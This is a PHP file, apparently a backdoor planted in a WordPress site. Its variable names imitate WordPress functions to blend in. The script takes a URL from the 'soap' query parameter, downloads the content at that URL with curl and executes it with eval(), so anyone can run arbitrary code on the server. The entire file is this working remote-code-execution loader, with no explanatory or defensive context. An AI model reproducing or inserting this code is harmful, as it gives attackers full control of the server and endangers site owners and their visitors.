<?php
if (isset($_GET['soap'])) {
$get_the_date_ei = $_GET['soap'];
if ($wp_enqueue_style_jb = curl_init()) {
curl_setopt($wp_enqueue_style_jb, CURLOPT_URL, $get_the_date_ei);
curl_setopt($wp_enqueue_style_jb, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($wp_enqueue_style_jb));
curl_close($wp_enqueue_style_jb);
exit;
}
}